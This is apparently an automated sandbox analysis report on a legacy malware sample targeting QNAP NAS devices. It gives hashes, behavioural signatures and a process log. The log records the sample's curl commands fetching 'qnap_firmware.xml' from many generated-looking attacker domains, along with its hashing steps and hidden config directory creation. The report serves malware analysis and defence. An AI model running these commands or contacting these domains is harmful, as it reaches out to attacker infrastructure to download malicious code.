Analysis
-
max time kernel
145s -
max time network
284s -
platform
debian-9_armhf -
resource
debian9-armhf-20240611-en -
resource tags
-
submitted
17-02-2025 17:59
General
-
Target
Malware-Feed-master/2020.07.27_CISA-Legacy_Malware_Targeting_QNAP_NAS/09ab3031796bea1b8b79fcfd2b86da
-
Size
18KB
-
MD5
8cee2a187198648c199c1d135c918a3a
-
SHA1
a9f39f3b832344a79d32d92ac56c50cdaff0b93c
-
SHA256
09ab3031796bea1b8b79fcfd2b86dac8f38b1f95f0fce6bd2590361f6dcd6764
-
SHA512
bb4a8c108c08b4da2ee36f8876c53c2ad28f793cc5ed9999eb81fcead95123adc13d6c718dc3c10e0be75c2b0760251d756a95c61341ff99a84be576d5d00374
-
SSDEEP
384:S0DO7oJgfOzs0KoWI3xMrKPDWsqLb0Tx75nrzoAU1j:L6TOzs0KfoxBBVcJ
Score
4/10
Malware Config
Signatures
-
Checks CPU configuration 1 TTPs 28 IoCs
Checks CPU information which indicate if the system is a virtual machine.
-
Reads runtime system information 64 IoCs
Reads data from /proc virtual filesystem.
-
Writes file to tmp directory 3 IoCs
Malware often drops required files in the /tmp directory.
Processes
-
/tmp/Malware-Feed-master/2020.07.27_CISA-Legacy_Malware_Targeting_QNAP_NAS/09ab3031796bea1b8b79fcfd2b86da/tmp/Malware-Feed-master/2020.07.27_CISA-Legacy_Malware_Targeting_QNAP_NAS/09ab3031796bea1b8b79fcfd2b86da1⤵
- Writes file to tmp directory
-
/bin/readlinkreadlink /share/Public2⤵
-
-
/bin/readlinkreadlink /share/Download2⤵
-
-
/bin/readlinkreadlink /share/Multimedia2⤵
-
-
/bin/readlinkreadlink /share/Web2⤵
-
-
/bin/readlinkreadlink /share/Recordings2⤵
-
-
/bin/readlinkreadlink /share/homes2⤵
-
-
/bin/sedsed -n "s/.*\\(\\/share\\/[^ /]\\+\\) .*/\\1/gp"2⤵
-
-
/bin/mountmount2⤵
- Reads runtime system information
-
-
/usr/bin/headhead -n 12⤵
-
-
/bin/grepgrep -F2⤵
-
-
/bin/mkdirmkdir /mnt/HDA_ROOT/.qpkg2⤵
-
-
/bin/mkdirmkdir /mnt/HDA_ROOT/.qpkg/.config2⤵
- Reads runtime system information
-
-
/bin/mktempmktemp ./.tmp.XXXXXX2⤵
- Writes file to tmp directory
-
-
/bin/sedsed "y/ABCDEFGHIJKLMNOPQRSTUVWXYZ-+\\//abcdefghijklmnopqrstuvwxyzabc/;s/=//g"2⤵
- Reads runtime system information
-
-
/usr/bin/opensslopenssl dgst -sha1 -binary2⤵
-
-
/bin/datedate "+%s"2⤵
-
-
/usr/bin/opensslopenssl base642⤵
-
-
/bin/rmrm -f ./.tmp.GPEvQt2⤵
-
-
/bin/datedate "+%s"2⤵
-
-
/usr/bin/curlcurl --connect-timeout 12 -m 30 -k -o ./.tmp.GPEvQt "https://pw8gjw.cf/qnap_firmware.xml?t=1739812179"2⤵
- Checks CPU configuration
- Reads runtime system information
-
-
/bin/datedate "+%s"2⤵
-
-
/usr/bin/curlcurl --connect-timeout 12 -m 30 -k -o ./.tmp.GPEvQt "https://pw8gjw2.cf/qnap_firmware.xml?t=1739812179"2⤵
- Checks CPU configuration
- Reads runtime system information
-
-
/bin/datedate "+%s"2⤵
-
-
/usr/bin/curlcurl --connect-timeout 12 -m 30 -k -o ./.tmp.GPEvQt "https://pw8gjw2f.cf/qnap_firmware.xml?t=1739812180"2⤵
- Checks CPU configuration
- Reads runtime system information
-
-
/bin/datedate "+%s"2⤵
-
-
/usr/bin/curlcurl --connect-timeout 12 -m 30 -k -o ./.tmp.GPEvQt "https://pw8gjw2fy.cf/qnap_firmware.xml?t=1739812186"2⤵
- Checks CPU configuration
- Reads runtime system information
-
-
/bin/datedate "+%s"2⤵
-
-
/usr/bin/curlcurl --connect-timeout 12 -m 30 -k -o ./.tmp.GPEvQt "https://pw8gjw2fyf.cf/qnap_firmware.xml?t=1739812192"2⤵
- Checks CPU configuration
- Reads runtime system information
-
-
/usr/bin/opensslopenssl base642⤵
-
-
/bin/sedsed "y/ABCDEFGHIJKLMNOPQRSTUVWXYZ-+\\//abcdefghijklmnopqrstuvwxyzabc/;s/=//g"2⤵
- Reads runtime system information
-
-
/usr/bin/opensslopenssl dgst -sha1 -binary2⤵
-
-
/bin/datedate "+%s"2⤵
-
-
/bin/datedate "+%s"2⤵
-
-
/usr/bin/curlcurl --connect-timeout 12 -m 30 -k -o ./.tmp.GPEvQt "https://lsdqn4.tk/qnap_firmware.xml?t=1739812193"2⤵
- Checks CPU configuration
- Reads runtime system information
-
-
/bin/datedate "+%s"2⤵
-
-
/usr/bin/curlcurl --connect-timeout 12 -m 30 -k -o ./.tmp.GPEvQt "https://lsdqn4h.tk/qnap_firmware.xml?t=1739812193"2⤵
- Checks CPU configuration
- Reads runtime system information
-
-
/bin/datedate "+%s"2⤵
-
-
/usr/bin/curlcurl --connect-timeout 12 -m 30 -k -o ./.tmp.GPEvQt "https://lsdqn4hd.tk/qnap_firmware.xml?t=1739812199"2⤵
- Checks CPU configuration
- Reads runtime system information
-
-
/bin/datedate "+%s"2⤵
-
-
/usr/bin/curlcurl --connect-timeout 12 -m 30 -k -o ./.tmp.GPEvQt "https://lsdqn4hdj.tk/qnap_firmware.xml?t=1739812200"2⤵
- Checks CPU configuration
- Reads runtime system information
-
-
/bin/datedate "+%s"2⤵
-
-
/usr/bin/curlcurl --connect-timeout 12 -m 30 -k -o ./.tmp.GPEvQt "https://lsdqn4hdjj.tk/qnap_firmware.xml?t=1739812201"2⤵
- Checks CPU configuration
- Reads runtime system information
-
-
/usr/bin/opensslopenssl base642⤵
-
-
/bin/sedsed "y/ABCDEFGHIJKLMNOPQRSTUVWXYZ-+\\//abcdefghijklmnopqrstuvwxyzabc/;s/=//g"2⤵
- Reads runtime system information
-
-
/usr/bin/opensslopenssl dgst -sha1 -binary2⤵
-
-
/bin/datedate "+%s"2⤵
-
-
/bin/datedate "+%s"2⤵
-
-
/usr/bin/curlcurl --connect-timeout 12 -m 30 -k -o ./.tmp.GPEvQt "https://mkcwki.ml/qnap_firmware.xml?t=1739812207"2⤵
- Checks CPU configuration
- Reads runtime system information
-
-
/bin/datedate "+%s"2⤵
-
-
/usr/bin/curlcurl --connect-timeout 12 -m 30 -k -o ./.tmp.GPEvQt "https://mkcwkic.ml/qnap_firmware.xml?t=1739812218"2⤵
- Checks CPU configuration
- Reads runtime system information
-
-
/bin/datedate "+%s"2⤵
-
-
/usr/bin/curlcurl --connect-timeout 12 -m 30 -k -o ./.tmp.GPEvQt "https://mkcwkica.ml/qnap_firmware.xml?t=1739812231"2⤵
- Checks CPU configuration
- Reads runtime system information
-
-
/bin/datedate "+%s"2⤵
-
-
/usr/bin/curlcurl --connect-timeout 12 -m 30 -k -o ./.tmp.GPEvQt "https://mkcwkican.ml/qnap_firmware.xml?t=1739812236"2⤵
- Checks CPU configuration
- Reads runtime system information
-
-
/bin/datedate "+%s"2⤵
-
-
/usr/bin/curlcurl --connect-timeout 12 -m 30 -k -o ./.tmp.GPEvQt "https://mkcwkicani.ml/qnap_firmware.xml?t=1739812238"2⤵
- Checks CPU configuration
- Reads runtime system information
-
-
/bin/sedsed "y/ABCDEFGHIJKLMNOPQRSTUVWXYZ-+\\//abcdefghijklmnopqrstuvwxyzabc/;s/=//g"2⤵
- Reads runtime system information
-
-
/usr/bin/opensslopenssl dgst -sha1 -binary2⤵
-
-
/bin/datedate "+%s"2⤵
-
-
/usr/bin/opensslopenssl base642⤵
-
-
/bin/datedate "+%s"2⤵
-
-
/usr/bin/curlcurl --connect-timeout 12 -m 30 -k -o ./.tmp.GPEvQt "https://ze0fah.ga/qnap_firmware.xml?t=1739812251"2⤵
- Checks CPU configuration
- Reads runtime system information
-
-
/bin/datedate "+%s"2⤵
-
-
/usr/bin/curlcurl --connect-timeout 12 -m 30 -k -o ./.tmp.GPEvQt "https://ze0fahd.ga/qnap_firmware.xml?t=1739812252"2⤵
- Checks CPU configuration
- Reads runtime system information
-
-
/bin/datedate "+%s"2⤵
-
-
/usr/bin/curlcurl --connect-timeout 12 -m 30 -k -o ./.tmp.GPEvQt "https://ze0fahdz.ga/qnap_firmware.xml?t=1739812252"2⤵
- Checks CPU configuration
- Reads runtime system information
-
-
/bin/datedate "+%s"2⤵
-
-
/usr/bin/curlcurl --connect-timeout 12 -m 30 -k -o ./.tmp.GPEvQt "https://ze0fahdzu.ga/qnap_firmware.xml?t=1739812253"2⤵
- Checks CPU configuration
- Reads runtime system information
-
-
/bin/datedate "+%s"2⤵
-
-
/usr/bin/curlcurl --connect-timeout 12 -m 30 -k -o ./.tmp.GPEvQt "https://ze0fahdzuo.ga/qnap_firmware.xml?t=1739812264"2⤵
- Checks CPU configuration
- Reads runtime system information
-
-
/usr/bin/opensslopenssl dgst -sha1 -binary2⤵
-
-
/usr/bin/opensslopenssl base642⤵
-
-
/bin/sedsed "y/ABCDEFGHIJKLMNOPQRSTUVWXYZ-+\\//abcdefghijklmnopqrstuvwxyzabc/;s/=//g"2⤵
- Reads runtime system information
-
-
/bin/datedate "+%s"2⤵
-
-
/bin/datedate "+%s"2⤵
-
-
/usr/bin/curlcurl --connect-timeout 12 -m 30 -k -o ./.tmp.GPEvQt "https://otozvp.gq/qnap_firmware.xml?t=1739812277"2⤵
- Checks CPU configuration
- Reads runtime system information
-
-
/bin/datedate "+%s"2⤵
-
-
/usr/bin/curlcurl --connect-timeout 12 -m 30 -k -o ./.tmp.GPEvQt "https://otozvpm.gq/qnap_firmware.xml?t=1739812278"2⤵
- Checks CPU configuration
- Reads runtime system information
-
-
/bin/datedate "+%s"2⤵
-
-
/usr/bin/curlcurl --connect-timeout 12 -m 30 -k -o ./.tmp.GPEvQt "https://otozvpmr.gq/qnap_firmware.xml?t=1739812288"2⤵
- Checks CPU configuration
- Reads runtime system information
-
-
/bin/datedate "+%s"2⤵
-
-
/usr/bin/curlcurl --connect-timeout 12 -m 30 -k -o ./.tmp.GPEvQt "https://otozvpmrg.gq/qnap_firmware.xml?t=1739812289"2⤵
- Checks CPU configuration
- Reads runtime system information
-
-
/bin/datedate "+%s"2⤵
-
-
/usr/bin/curlcurl --connect-timeout 12 -m 30 -k -o ./.tmp.GPEvQt "https://otozvpmrgw.gq/qnap_firmware.xml?t=1739812295"2⤵
- Checks CPU configuration
- Reads runtime system information
-
-
/usr/bin/opensslopenssl dgst -sha1 -binary2⤵
-
-
/usr/bin/opensslopenssl base642⤵
-
-
/bin/sedsed "y/ABCDEFGHIJKLMNOPQRSTUVWXYZ-+\\//abcdefghijklmnopqrstuvwxyzabc/;s/=//g"2⤵
- Reads runtime system information
-
-
/bin/datedate "+%s"2⤵
-
-
/bin/datedate "+%s"2⤵
-
-
/usr/bin/curlcurl --connect-timeout 12 -m 30 -k -o ./.tmp.GPEvQt "https://yk0yee.com/qnap_firmware.xml?t=1739812306"2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
-
-
/bin/rmrm -f ./.tmp.GPEvQt2⤵
-
-
/bin/datedate "+%s"2⤵
-
-
/usr/bin/curlcurl --connect-timeout 12 -m 30 -k -o ./.tmp.GPEvQt "https://yk0yeem.com/qnap_firmware.xml?t=1739812309"2⤵
- Checks CPU configuration
- Reads runtime system information
-
-
/bin/datedate "+%s"2⤵
-
-
/usr/bin/curlcurl --connect-timeout 12 -m 30 -k -o ./.tmp.GPEvQt "https://yk0yeemh.com/qnap_firmware.xml?t=1739812322"2⤵
- Checks CPU configuration
- Reads runtime system information
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
625B
MD53536dc15bba5feac11bcc94f92927133
SHA1f91396be5681a92f43d7be0724b0640999aebe01
SHA256ce4b1a7c87e73a3308f964c1b4d15237fdf5bf39febfbfca0c6eb6badda9b9e2
SHA51220029ab8c92349a3a2d6ea9148838db8feac3fb7e041edbd7f2683e9f4c9cc7b46bb69d0a2e742c05e419f3f6f64dd62d480fa409bce3947a6fe7052075fee5d